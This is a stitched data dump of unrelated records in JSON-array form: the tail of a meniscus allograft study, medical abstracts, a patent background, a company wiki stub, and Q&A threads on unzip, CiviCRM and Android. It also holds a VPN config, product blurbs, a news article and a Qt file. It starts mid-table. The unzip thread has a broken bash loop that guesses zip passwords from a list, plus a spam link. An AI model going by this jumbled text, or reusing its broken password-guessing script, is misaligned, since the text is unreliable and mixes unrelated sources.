(mm)0--4.00--5.10--5.30--5.2Std1.*p* value best--1.0000.0100.150*p* value 3D MRI----0.0090.133*p* value 2D MRI------1.000Outliers\\*W/L/H6111825MaSD20285769*Std* standard deviation, *Min* minimum, *Max* maximum, *W* width, *L* length, *H* height, *MaSD* maximum surface distance\\*Outliers were defined as *W* (width difference) \\> 5 mm, *L* (length difference) \\> 5 mm, *H* (height difference) \\> 4 mm, or MaSD (maximal surface distance) \\> 5 mmFig. ", "6Results for the medial meniscus. ", "Boxplots for the medial menisci. ", "The median (middle quartile) marks the midpoint of the data and is shown by the line that divides the box into two parts. ", "The box represents the middle 50% of values, and the upper and lower whiskers represent the range. ", "The outliers are marked as separate points and defined as values more than 1.5 times the median. ", "MeSD = mean surface distance; MaSD = maximum surface distance; Diff width/length/height= difference between the selected allograft dimensions and the original meniscus dimensionsFig. ", "7Results for the lateral meniscus. ", "Boxplots for the lateral menisci. ", "The median (middle quartile) marks the midpoint of the data and is shown by the line that divides the box into two parts. ", "The box represents the middle 50% of values, and the upper and lower whiskers represent the range. ", "The outliers are marked as separate points and defined as values more than 1.5 times the median. ", "MeSD = mean surface distance; MaSD = maximum surface distance; Diff width/length/height= difference between the selected allograft dimensions and the original meniscus dimensions\n\nNone of the presented sizing methods always selected the best available fitting allograft (which corresponded to the original meniscus) out of the imaginary tissue bank. ", "In particular, the 3D shape (MeSD and MaSD) in these cases was different between the selected and the original meniscus, while the width, length, and height were not distinct.", "\n\n3D-MRI sizing, which takes the 3D shape into account, significantly improved the accuracy of allograft selection compared with 2D-MRI (*p* \\< 0.001) and 2D-RX (*p* \\< 0.001) sizing.", "\n\nFurthermore, 3D-MRI sizing reduced the number of outliers. ", "For the medial meniscus, there were 12% fewer outliers selected compared with 2D-MRI sizing and 48% fewer outliers selected compared with 2D-RX sizing. ", "For the lateral meniscus, there were 7% fewer outliers selected compared with 2D-MRI sizing and 14% fewer outliers selected compared with 2D-RX sizing.", "\n\nInter-rater/intra-rater reliability {#Sec14}\n-----------------------------------\n\nThe interclass correlations for the medial and lateral menisci were good to excellent; see Table [3](#Tab3){ref-type=\"table\"} for details (\\< 0.5 = poor, 0.5--0.75 = moderate, 0.75--0.9 = good, \\> 0.9 = excellent). ", "Table 3Interclass correlations (ICCs)WidthLength3D surfaceIntra-raterInter-raterIntra-raterInter-raterIntra-raterInter-raterMedial meniscus3D-MRI sizing0.9170.9110.9690.9580.9540.9112D-MRI sizing0.9420.8350.8020.7872D-RX sizing0.9020.8960.9340.880Lateral meniscus3D-MRI sizing0.9010.9220.9570.9670.8900.8962D-MRI sizing0.7820.7030.9540.8972D-RX sizing0.8930.8470.9340.880\n\nDiscussion {#Sec15}\n==========\n\nThe most appropriate methods for meniscus sizing are still debated. ", "Even under laboratory conditions, the most familiar radiographic method of Pollard had a standard error of prediction of ± 2.9 mm for meniscal width and ± 3.8 mm for meniscal length \\[[@CR31]\\], which corresponds to a standard error of approximately 8%. ", "Considering that the proposed 10% graft mismatch could cause relevant articular problems (i.e., 3- or 4-mm size difference based on meniscal sizes reported in the literature), the Pollard method seems to not be completely safe \\[[@CR17], [@CR37]\\]. ", "Although MRI sizing seems to be superior to the radiological methods, 17% of the measured menisci in a cadaver study by Shaffer had differences of over 5 mm compared with the anatomical measurements \\[[@CR36]\\]. ", "Other authors have shown better results with an average error rate of 4.0--5.3% \\[[@CR35]\\]. ", "Because sizing is performed based on two variables (i.e., width and length), inaccuracy is probably magnified by the combination of both.", "\n\nIn a previous study, a new 3D meniscus sizing method was proposed, which was based on a healthy contralateral meniscus template to reduce inaccuracy \\[[@CR40]\\]. ", "For this sizing method, there are some basic prerequisites, which must be fulfilled and will be discussed in the following section. ", "First, an easily determined, pose-invariant measurement parameter is required to accurately compare freely moveable 3D bodies. ", "Second, the segmented 3D meniscus has to correspond with the actual 3D anatomical shape. ", "Third, the contralateral meniscus has to be similar. ", "Fourth, the benefits of a 3D sizing method must be compared with those of the currently used sizing methods. ", "Fifth, the additional benefit has to be validated with improved clinical results.", "\n\nBasic prerequisites for 3D sizing {#Sec16}\n---------------------------------\n\nThe similarity of 3D models can be evaluated by the surface distance, as already described in a previous study \\[[@CR40]\\]. ", "However, it is not yet known whether 3D sizing should be performed by the closest MeSD or by the closest MaSD, or a combination of these measures. ", "Depending on the chosen criterion, the best allograft would be the selected according to the MeSD or to MaSD. ", "Because there were poor correlations between these two values (*R*^2^ = 0.430--0.495), similar to the poor correlations between meniscal width and length (*R*^2^ = 304--310), these values could provide different information. ", "The MeSD was generally less variable as the MaSD could be affected by one single surface point with a wide distance between the two models---for example, due to a partly segmented transverse or meniscotibial ligament. ", "Therefore, we assessed sizing primarily based on the MeSD.The MaSD value was on average 5.3 times the MeSD value in our collection of 38,920 meniscus matched pairs. ", "The best relationship was 2.6 times the value and reached up to 11.7 times the value. ", "In conclusion, a very good fitting allograft could be expected by low (\\< 1.0 mm) MeSD combined with an MaSD value of less than 3 times the MeSD value. ", "For examples, see Fig. [", "5](#Fig5){ref-type=\"fig\"}.A direct comparison of the anatomical and segmented shapes remains unavailable. ", "However, to date, MRI measurements are often used as the gold standard and seem very good at identifying the meniscus tissue \\[[@CR32], [@CR33], [@CR35], [@CR37], [@CR39]\\].In a previous study, we showed that the contralateral side can be used as a very precise and reliable meniscus template for 3D sizing.", "Our results are not directly comparable to previous studies. ", "3D sizing is based on MeSD and not on meniscal width and length. ", "Therefore, a comparison to previous studies was not possible. ", "We solved this problem by a simulated allograft selection based on the three sizing methods from an imaginary tissue bank of 138 different menisci. ", "The selected allografts could be easily compared. ", "An important advantage of this evaluation was the fact that the multiplicative inaccuracy due to a combination of two imprecise parameters (i.e., width and length) was taken into account. ", "Herein, we showed a significant improvement of the 3D shape of the selected meniscus allograft with sizing by the MeSD compared with sizing by the combined meniscal width and length. ", "There were also improvements based on meniscal width, length, and height measures, but these improvements were not statistically significant for all values. ", "Similar to many other studies, the mean width and length values of the selected menisci were good and mostly acceptable across the three sizing methods. ", "However, the main problem of meniscus allograft sizing is related to the number of selected outliers. ", "In our opinion, this is exactly the strength of the 3D sizing method. ", "The number of outliers selected could be reduced by 12--29% compared with 2D-MRI sizing and by 41--53% compared with 2D-RX sizing. ", "We defined outliers as a size difference between the original and selected meniscus of \\> 5 mm in width or length and \\> 4 mm in height. ", "A cutoff value of 5 mm for width and length has previously been used by other authors \\[[@CR25], [@CR36]\\]. ", "A cutoff value based on meniscal height had not been previously described. ", "In our collection, the meniscal height had a mean value of 9.3--9.9 mm with a standard deviation of only ± 1.4 mm. ", "Therefore, a cutoff value for meniscal height of \\> 5 mm would probably never become applicable. ", "Because the clinical evidence regarding meniscal height is still unclear, we did not choose our cutoff value based on the 10% meniscal mismatch rule \\[[@CR17]\\], but on \\> 4 mm, which was slightly higher than the slide thickness and detected only 5 mismatched menisci overall.", "\n\nThere are few limitations of this study. ", "As already mentioned under the second point above, a direct comparison of the anatomical and segmented shapes is missing. ", "However, the meniscus can be accurately identified in MRI, and MRI is therefore often used as the gold standard \\[[@CR32], [@CR33], [@CR35], [@CR37], [@CR39]\\]. ", "Because a mismatch of 3--4 mm (10%) appears to be clinically relevant, a slide thickness of up to 3 mm can significantly influence the results. ", "Therefore, a biplanar segmentation of the meniscus with excellent inter-rater and intrarater reliability for width and length (ICC~inter~ 0.913--0.973; ICC~intra~ 0.955--0.987) was used \\[[@CR40]\\]. ", "Furthermore, a larger tissue bank could probably have improved our results. ", "However, the number of allografts used is probably sufficient, as there are many tissue banks with (much) less than 138 different available allografts (on request).", "\n\n3D meniscus sizing has some great advantages, as already mentioned in a previous study \\[[@CR40]\\]. ", "In the present study, we demonstrated---even with a limited number of 138 allografts---that 3D sizing can significantly improve the accuracy and substantially reduce the number of relevant outliers. ", "In conclusion, the limited number of meniscus allografts due to increased demand in the world could be much better matched to the patients. ", "Moreover, this method can be used to do more than find the best fitting 3D allograft. ", "If necessary, a slightly smaller size due to presumed extrusion or slightly greater size due to presumed shrinkage can be easily found by down- or upscaling the 3D template \\[[@CR14]\\]. ", "Furthermore, the feasibility of \"bone plugs\" or \"bone bridge\" fixation methods, which are supposed to be superior to \"soft-tissue\" and \"suture bone tunnel\" fixation techniques, could also be improved due to the 3D method identifying the shape of the meniscus \\[[@CR14], [@CR42]\\]. ", "This 3D template could also be used in the future for biomimetic 3D-printed scaffolds \\[[@CR43], [@CR44]\\].", "\n\nHowever, 3D sizing involves additional costs. ", "An MRI scan of the contralateral side is needed, and the tissue banks must be willing to offer this option. ", "3D surface models must be generated for all allografts. ", "In the future, meniscus segmentation could probably be performed in a semiautomated or fully automated manner \\[[@CR45], [@CR46]\\], which could reduce additional costs. ", "Automatized comparison of the meniscus template of the healthy contralateral meniscus and all available allografts is already possible.", "\n\nConclusion {#Sec17}\n==========\n\n3D-MRI sizing by MeSD using the contralateral meniscus as a reconstruction template can significantly improve the accuracy of meniscus allograft selection and reduce outliers compared with sizing that relies only on width and length in radiography and MRI. ", "Using these methods, the limited number of available allografts could probably be more effectively distributed based on the rising demand in the world.", "\n\n2D/3D\n\n: Two-/three-dimensional\n\nAP\n\n: Anteroposterior\n\nIPC\n\n: Iterative closest point\n\nLAT\n\n: Lateral\n\nMaSD\n\n: Maximum surface distance\n\nMeSD\n\n: Mean surface distance\n\nMIMICS\n\n: Materialise Interactive Medical Control System\n\nMRI\n\n: Magnetic resonance imaging\n\nRX\n\n: Radiograph\n\nStd\n\n: Standard deviation\n\n**Publisher's Note**\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.", "\n\nNone\n\nSB, SFF, and LV contributed the idea. ", "SB and LJ collected and evaluated the data. ", "MVA and PF worked the computer programming part. ", "RS performed the radiological part. ", "SB, LJ, MVA, RS, PF, SFF, and LV wrote the manuscript. ", "The author(s) read and approved the final manuscript.", "\n\nNone\n\nThe datasets during and/or analyzed during the current study available from the corresponding author on reasonable request.", "\n\nKantonale Ethikkommission Zürich had given the approval for the study (BASEC-No. ", "2018-00856).", "\n\nNone\n\nThe authors, their immediate families, and any research foundations with which they are affiliated have not received any financial payments or other benefits from any commercial entity related to the subject of this article. ", "All authors have read and approved the final submitted manuscript.", "\n" ]
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[ "Pharmacological basis of the classification of calcium antagonists.", "\nIn this brief account of Ca antagonists, I have attempted to illustrate similarities and differences among selective Ca antagonists. ", "Four typical pharmacological profiles may be recognized by taking into account studies at molecular, cellular and tissular levels. ", "This gives a rational basis for understanding that all calcium antagonists do not show identical therapeutic actions." ]
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[ "How do I unzip multiple / many files under Linux?", "\n\nI have lots of files in a directory called /disk2/images/. All files are in zip file format, so I am using the following command to extract zip files:unzip *.zip The command result into an error which read as follows:caution: filename not matched How do I unzip multiple or many zip files under a Linux/Unix-like system? ", "Linux or Unix-like system use the unzip command to list, test, or extract files from a ZIP archive, commonly found on MS-DOS systems.", "\n\nThe problem with multiple zip files on Linux\n\nAssuming that you have four file in a /disk2/images/ directory as follows:\n\nAbove error indicate that you used the unzip command wrongly. ", "It means extract invoices.zip, pictures.zip, and visit.zip files from inside the data.zip archive. ", "Your shell expands the command ‘unzip *.zip’ it as follows:unzip data.zip invoices.zip pictures.zip visit.zip The solution is pretty simple when you want to unzip the file using the wild card; you have two options as follows.", "\n\n#1: Unzip Multiple Files Using Single Quote (short version)\n\nThe syntax is as follows to unzip multiple files from Linux command line:\n\n# If files are password protected, and we are not sure which password for Z_FILE in *.zip; do for PASSWD in [ pass123, PASS123, abc123, ABC123 ]; do unzip -P $PASSWD $Z_FILE; if [ $? ", "= 0 ]; then # successful unzip break fi done done\n\nI tried unzip -P $PASSWD $Z_FILE; command but it is not working and for same zip file it is working in US with same password. ", "I read in one of the web sites that, non USA system needs to install a patch for running above command. ", "If yes Please let me know where can I get this patch else please let me know how to run this command.", "\n\nI had a pile of zip that each contained a index.html file and the archive structure had no folder.. They obviously had to be extracted in separate folders so as to not overwrite the so precious files. ", "Since it was a temporary “view and delete” kind of thing and with well over a hundred files (not needing to be unzipped in a specific folder, current folder was just fine), i came up with this; for z in *.zip; do q=$(echo $z | cut -f 1 -d '.'); ", "unzip $z -d ./$q; done;\n\nCouple seconds after i figured “oh well”, i saved that much time so i might as well make something out of it… So instead of just ‘hardcoding’ it into a simple bash alias that doesn’t take parameters, I took a couple more minutes to have it let me at least input a base directory for extraction. ", "Here’s what i came up with (function in .bashrc file); unzipALL() { dir='.'; [[ ! ", "-z \"${1// }\" ]] && dir=$1; for z in *.zip; do q=$(echo $z | cut -f 1 -d '.'); ", "unzip $z -d $dir/$q; done; }\n\nFrom the command line just use unzipAll to unzip to the current folder or pass it a folder name: unzipAll /tmp extracts all to /tmp/%filename%.", "\n\nIt does perform a single basic check on the passed parameter but nothing too fancy (strip spaces before/after then checks against null). ", "One could spend more time and cutomize it further, adding bad directory check and all that…\n\nI figure i’d share… thanks and hopefuly it can be of use to someone!", "\n\nI hope i didn’t break any rules posting a url in here, sorry if so heeh\n\nHence the quick function. ", "If you have a better way please share Also, while testing you assumptions, i found out that unzip tries to look for .ZIP files on it’s own – pretty neat… unzip \\* would work (still not help with the issue…)\n\nI just pulled a lot of files (over 400K) all of them were in zip, i’m trying to make huge archive off free documents at http://uploadcoins.com , so for me worked # unzip \\*.zip , all that 400K went ok :) , so again, You can use unzip \\*.zip , Good luck" ]
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[ "1. ", "Field of the Invention\nThe present invention relates to damping apparatus. ", "In particular, the present invention relates to damping apparatus as in the deployment mechanisms of spacecraft.", "\nWhile the present invention is described herein with reference to a particular embodiment or illustration, it is understood that the invention is not limited thereto. ", "Those of ordinary skill in the art, having access to the teachings provided herein, will recognize additional modifications, applications and embodiments within the scope of the invention.", "\n2. ", "Description of the Related Art\nAs is well known, conventional rotary damping mechanisms employ a paddle mounted on a shaft for movement within a chamber filled with a damping fluid. ", "As the shaft is rotated within the housing the fluid flows from one side of the paddle to the other through a small gap between the paddle and the housing. ", "This action provides a damping force proportional to velocity and hence the rate of deployment can be limited.", "\nA damping and deployment mechanism is typically a damping mechanism fitted with an actuator, typically a spring, and a latch. ", "Thus, the spring provides the actuation force which is damped by the damping mechanism. ", "The damping and deployment mechanism will experience a controlled motion to the end of travel at which time the latches will engage and hold the mechanism in its deployed position.", "\nUnfortunately, these mechanisms typically have several shortcomings of which the leakage of damping fluid is but one example. ", "In many applications, leakage of damping fluid may be tolerated; however, in certain more demanding applications, this leakage may be problematic. ", "For example, in space and other remote environments, leakage of fluid from a damping mechanism in a deployment system may cause enough damage to impact on the success or failure of the mission. ", "That is, the leakage may reduce the damping capacity of the mechanism and allow a substantial force to be applied to the spacecraft structure, due to increased impact velocities, causing breakage of and damage to critical system components. ", "This may also lead to contamination of adjacent spacecraft components. ", "Thus, durable, reliable operation of such damping and deployment mechanisms is often a design objective of high priority as maintenance, repair, and replacement may be quite costly or impossible.", "\nAnother typical shortcoming of conventional damping and deployment mechanisms is that the mechanism is typically constrained to latch in a fixed position. ", "In some applications, there is a need to latch, albeit temporarily, in some intermediate position. ", "Thus, variable latching, the capability to latch in any position within the range of movement of the deployment arm, is deemed to be desirable.", "\nFurther, there is typically no provision for varying the rate of deployment of structures using conventional deployment mechanisms. ", "It is considered to be desirable that the rate and degree of deployment be controlled. ", "This would permit the use of more powerful actuators (heavier springs) and still control the deployment rate.", "\nAlso, conventional damping mechanisms do not add to the stiffness of the deployed systems. ", "That is, once the deployment is complete, only a latch prevents the joint from becoming fluid again. ", "It would be advantageous to provide a stronger joint than is typically characteristic in a simple latch.", "\nFurther, conventional systems are gap dependent. ", "That is, the damping rate is typically a function of the gap between the paddle and the walls of the chamber through which the fluid must flow. ", "The need to control the dimensions of these gaps adds significantly to the cost of manufacture of conventional deployment mechanisms.", "\nThere is, therefore, a need in the art for a simple, low cost improved damping and deployment mechanism that is less likely to leak; offers variable latching; is rate controllable; is load independent; and adds to the stiffness of the deployed system." ]
{ "pile_set_name": "USPTO Backgrounds" }
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Delphi Technologies\n\nOn 5 December 2017 Delphi Automotive renamed itself Aptiv and spun off its powertrain and aftermarket related businesses to a stand-alone company Delphi Technologies PLC. ", "The $4.5 billion company began trading under the former Delphi Automotive symbol DLPH on the New York Stock Exchange. ", "It was added to the S&P MidCap 400 Index on 6 December 2017.", "\n\nThe company provides combustion systems, electrification products and software and controls, and operates in the passenger car and commercial vehicle markets, and in vehicle repair through a global aftermarket network. ", "The company has 20,000 employees including 5,000 engineers. ", "It is headquartered in London, U.K. and operates technical centers, manufacturing sites and customer support services in 24 countries.", "\n\nUpon the formation of Delphi Technologies, Liam Butterworth, head of the former Delphi Automotive's global powertrain business since 2014, was named CEO. ", "In October 2018, he left the company, and director and former Tenneco COO Hari Nair was named interim CEO. ", "On 7 January 2019 Richard Dauch was named new CEO.", "\n\nOn 28 January 2020, BorgWarner Inc. agreed to buy Delphi Technologies in an all-stock transaction that values Delphi at about $3.3 billion.", "\n\nReferences\n\nExternal links \n\nCategory:Companies based in the City of Westminster\nCategory:British brands\nCategory:Auto parts suppliers of the United Kingdom\nCategory:Announced mergers and acquisitions\nCategory:Manufacturing companies established in 2017\nCategory:British companies established in 2017\nCategory:Corporate spin-offs\nCategory:Companies listed on the New York Stock Exchange" ]
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[ "Q:\n\nHow to do a 'mock up' event or prolfile form without it going 'live' on the website?", "\n\nI have just started using CiviCRM so I am still finding my way around. ", "Is there a way to create, for example, an event or a newsletter sign-up form and see what it would look like on the website without making it go live on the net? ", "Someone else takes care of our website, I just do CiviCRM, so I don't want to mess up our website while I am still figuring out how to use Civi!", "\nAny advice would be most appreciated.", "\nThanks!", "\n-Mia\n\nA:\n\nOn the first step when creating a new event, down near the bottom of the form, there is a checkbox labelled \"Is this Event Active?\" ", "Un-check this and the event will be hidden from the public. ", "You can come back later to set to true -- it's on the first tab when configuring the event.", "\nTo display the event on a WordPress / CiviCRM site you need to insert a shortcode for the event into a WordPress post. ", "Put your cursor into the body of the post, then click on the CiviCRM triangular icon just above the field. ", "Choose appropriate options like an event and test rather live page. ", "That will let you test purchasing a ticket for the event without having to pay real money. ", "Test tickets purchased also dont show up in standard reports and participant counts. ", "When you are satisfied with the purchase pages and emails sent you should switch the shortcode to the live page and ènable the event.", "\nGood luck.", "\n\n" ]
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[ "client\ndev tun\nproto tcp\nremote au-melbourne.privateinternetaccess.com 501\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\ncipher aes-256-cbc\nauth sha256\ntls-client\nremote-cert-tls server\n\nauth-user-pass /config/openvpn-credentials.txt\ncomp-lzo\nverb 1\nreneg-sec 0\ncrl-verify /etc/openvpn/pia/tcp-strong/crl.rsa.4096.pem\nca /etc/openvpn/pia/tcp-strong/ca.rsa.4096.crt\ndisable-occ\n" ]
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[ "SMA751\n\nSatellite sensor for airbag systems\n\nApplication & Technical Summary\n\nSMA7xy sensors are primarily used in airbag systems for crash or rollover detection. ", "These signals are vital information during the first milliseconds of a crash.", "\n\nThe SMA760 is used for the detection of front or side crashes in the airbag ECU. ", "The plausibility check of its signals can be based either on the SMA720 or the signals of the satellite sensors. ", "The latter are available in a large number of variants due to two package options, four options for sensitive axes, several options for measurement ranges and featuring more than 80 differing PSI5 modes.", "\n\nAnother option for the plausibility check is the ECU sensor SMA720. ", "Its front crash ax signal makes it an ideal companion to the SMA760, and its vertical az signal makes it an ideal companion to SMI860 for rollover accident detection.", "\n\nProduct benefits\n\nCompliant with VDA AK-LV27 specification\n\nTarget application\n\nSatellite sensors\n\nvast field experience\n\ngained from hundreds of millions sensors is the fundament of the SMA7xy" ]
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[ "Human placental lipid induces melanogenesis by increasing the expression of tyrosinase and its related proteins in vitro.", "\nLipids, particularly sphingolipids, are emerging as novel regulators of cellular activity. ", "A placental total lipid fraction (PTLF), the total lipid prepared from an hydroalcoholic extract of fresh term human placenta, was previously shown to have a pigment-inducing activity in an animal model. ", "The PTLF contains sphingolipids which stimulate DNA synthesis and melanin formation with marked morphological changes in B16F10 melanoma cells. ", "In order to identify the mechanism underlying the increased melanin synthesis, B16F10 cells were treated with PTLF to assess the catalytic activities of tyrosinase (i.e. tyrosine hydroxylase and DOPA oxidase), the key regulatory enzyme of melanin synthesis. ", "Tyrosine hydroxylase (estimated by the release of (3)H(2)O) as well as DOPA oxidase (measured spectrophotometrically and also in non-denaturing gels), was stimulated significantly by PTLF. ", "Western blot analysis demonstrated an increase in the expression of tyrosinase, tyrosinase related proteins 1 and 2 (TRP1 and TRP2) at the protein level and RT-PCR analysis revealed stimulated transcription of tyrosinase, TRP1 and TRP2 mRNAs in PTLF-treated B16F10 cells. ", "Actinomycin D and cycloheximide, inhibitors of transcription and translation, respectively, inhibited PTLF-induction of tyrosinase activity with a corresponding decrease in melanogenesis. ", "In all cases, the response to PTLF was similar to that induced by alpha-melanocyte stimulating hormone, a well-known stimulator of melanogenesis. ", "Thus, these results provide the basis of action of PTLF stimulated melanogenesis in B16F10 cells showing that this placental extract is a strong inducer of pigmentation at the transcriptional and translational levels." ]
{ "pile_set_name": "PubMed Abstracts" }
[ 0, 0, 0, 0.006944444444444444, 0, 0.005291005291005291, 0.003676470588235294, 0, 0, 0.004608294930875576 ]
[ "Getty Images Spending too long at the office causes stress and unhappiness\n\nFREE now SUBSCRIBE Invalid email Sign up to the Secret Elves Club fornow We will use your email address only for sending you newsletters. ", "Please see our Privacy Notice for details of your data protection rights.", "\n\nThe shocking discovery was made by website TotallyMoney.com, who found that despite slogging away for long hours in the office, 70 per cent of British workers were not paid for their overtime. ", "This means from as early in the year as September 14th, Brits are essentially working for free, having already completed our contracted hours for the year.", "\n\nSome occupations fare worse than others with those working in the caring professions, such as hard working nurses, being hardest hit. ", "Teachers were putting in lots of extra time, working on average 54 days free work each year.", "\n\nGetty Images Brits are giving their bosses hours of extra time a day\n\nAn overwhelming majority were unpaid for this extra time, up to 87 per cent. ", "Overtime doesn’t have to mean staying late after work, it can also mean grabbing lunch at your desk - working through the lunch hour - or arriving at work a few minutes early. ", "Joe Gardiner, from TotallyMoney.com reflected on the state of Britain’s working lives and said: \"It’s quite a depressing situation. ", "We all want to do a good job when we’re at work, but there’s a line that it seems many of us cross when we’re giving our employers more time than we’re actually getting paid for.\"", "\n\nGetty Images Brits already work the longest hours in Europe\n\nOffices in the 1980s Tue, September 15, 2015 Do you remember how offices looked in the 1980s? ", "These retro pictures depict office life before the millennial. ", "Play slideshow Caters News Agency 1 of 14 Bright pink walls and mannequin legs are something you wouldn't find in today's offices\n\nWhilst Britons as a whole put in many extra hours, some regions stay in the office longer than others. ", "Those in London work an extra 8.9 hours a week, more than a standard day in the office, whilst those in the West Midlands and the Northwest have the best work/life balance and manage to get away with only 8.1 hours extra. ", "Surprised by the results of their survey, TotallyMoney.com have launched an online overtime calculator where you can see for yourself just how much extra time you are handing over to your boss." ]
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[ "/****************************************************************************\n**\n** Copyright (C) 2017 The Qt Company Ltd.\n** Contact: https://www.qt.io/licensing/\n**\n** This file is part of the test suite of the Qt Toolkit.", "\n**\n** $QT_BEGIN_LICENSE:BSD$\n** Commercial License Usage\n** Licensees holding valid commercial Qt licenses may use this file in\n** accordance with the commercial license agreement provided with the\n** Software or, alternatively, in accordance with the terms contained in\n** a written agreement between you and The Qt Company. ", "For licensing terms\n** and conditions see https://www.qt.io/terms-conditions. ", "For further\n** information use the contact form at https://www.qt.io/contact-us.", "\n**\n** BSD License Usage\n** Alternatively, you may use this file under the terms of the BSD license\n** as follows:\n**\n** \"Redistribution and use in source and binary forms, with or without\n** modification, are permitted provided that the following conditions are\n** met:\n** * Redistributions of source code must retain the above copyright\n** notice, this list of conditions and the following disclaimer.", "\n** * Redistributions in binary form must reproduce the above copyright\n** notice, this list of conditions and the following disclaimer in\n** the documentation and/or other materials provided with the\n** distribution.", "\n** * Neither the name of The Qt Company Ltd nor the names of its\n** contributors may be used to endorse or promote products derived\n** from this software without specific prior written permission.", "\n**\n**\n** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n** \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n** A PARTICULAR PURPOSE ARE DISCLAIMED. ", "IN NO EVENT SHALL THE COPYRIGHT\n** OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n** LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n** DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n** THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n** OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"", "\n**\n** $QT_END_LICENSE$\n**\n****************************************************************************/\n\nimport QtQuick\nimport QtQuick.", "Controls\n\nPopup {\n}\n" ]
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[ "Q:\n\nAndroid RecyclerView Swipe to delete with Icon only drawed on first element\n\nEverything works great, but one thing is not really working.", "\nThe delete icon is only rendered on the first element of the recycler view list as you can see in the image.", "\n\nHere is my code of the ItemTouchHelper class:\nclass ItemSwipeCallback(val context: Context) : ItemTouchHelper.", "Callback() {\n private val listeners = ArrayList<OnItemSwipe>()\n\n private val paint = Paint()\n val theme = context.themeId\n val icon = ContextCompat.getDrawable(context, R.drawable.ic_delete_filled_white_24dp)!!", "\n\n override fun onMove(\n recyclerView: RecyclerView,\n viewHolder: RecyclerView.", "ViewHolder,\n target: RecyclerView.", "ViewHolder): Boolean {\n\n return true\n }\n\n override fun getMovementFlags(recyclerView: RecyclerView, viewHolder: RecyclerView.", "ViewHolder): Int {\n val direction = context.sharedPreferences.getInt(Preferences.", "SWIPE_DIRECTION, Preferences.", "SWIPE_VALUE_RIGHT)\n\n return when (direction) {\n Preferences.", "SWIPE_VALUE_RIGHT -> makeMovementFlags(0, ItemTouchHelper.", "RIGHT)\n Preferences.", "SWIPE_VALUE_LEFT -> makeMovementFlags(0, ItemTouchHelper.", "LEFT)\n else -> makeMovementFlags(0, ItemTouchHelper.", "RIGHT)\n }\n }\n\n override fun onSwiped(viewHolder: RecyclerView.", "ViewHolder, direction: Int) {\n listeners.forEach { it.onSwiped(viewHolder.layoutPosition, direction) }\n }\n\n override fun onChildDraw(c: Canvas, recyclerView: RecyclerView, viewHolder: RecyclerView.", "ViewHolder,\n dX: Float, dY: Float, actionState: Int, isCurrentlyActive: Boolean) {\n\n super.onChildDraw(c, recyclerView, viewHolder, dX, dY, actionState, isCurrentlyActive)\n\n if (dX !", "= 0f && isCurrentlyActive) {\n val itemView = viewHolder.itemView\n paint.color = Color.parseColor(\"#D32F2F\")\n val top = (itemView.height - icon.intrinsicHeight) / 2\n val left = itemView.width - icon.intrinsicWidth - top\n\n if (theme == Preferences.", "THEME_VALUE_DARK) {\n icon.setTint(Color.", "BLACK)\n } else {\n icon.setTint(Color.", "WHITE)\n }\n\n if (dX < 0) {\n val background = RectF(itemView.right.toFloat() + dX, itemView.top.toFloat(),\n itemView.right.toFloat(), itemView.bottom.toFloat())\n c.drawRect(background, paint)\n icon.setBounds(left, top, left + icon.intrinsicWidth, top + icon.intrinsicHeight)\n } else {\n val background = RectF(itemView.left.toFloat() + dX, itemView.top.toFloat(),\n itemView.left.toFloat(), itemView.bottom.toFloat())\n c.drawRect(background, paint)\n icon.setBounds(top, top, top + icon.intrinsicWidth, top + icon.intrinsicHeight)\n }\n icon.draw(c)\n }\n }\n\n fun addOnItemSwipeListener(onItemSwipe: OnItemSwipe) {\n listeners.add(onItemSwipe)\n }\n}\n\nMaybe the icon which is loaded on the head of the class is only usable once? ", "I tried already to convert it into a Bitmap and use it. ", "I also tried loading it in the onChildDraw function.", "\n\nA:\n\nThe solution was too easy. ", "I always used itemView.height instead of itemView.top.", "\nThe canvas includes all items. ", "Not every item has its own canvas. ", "So i have to add the height of the above items too.", "\nThe working code looks like this:\nval top = itemView.top + (itemView.height - intrinsicHeight) / 2\nval left = itemView.width - intrinsicWidth - (itemView.height - intrinsicHeight) / 2\nval right = left + intrinsicHeight\nval bottom = top + intrinsicHeight\n\nif (dX < 0) {\n background.setBounds(itemView.right + dX.toInt(), itemView.top, itemView.right, itemView.bottom)\n icon.setBounds(left, top, right, bottom)\n} else if (dX > 0) {\n background.setBounds(itemView.left + dX.toInt(), itemView.top, itemView.left, itemView.bottom)\n icon.setBounds(top, top, top, bottom)\n}\nbackground.draw(c)\nicon.draw(c)\n\n" ]
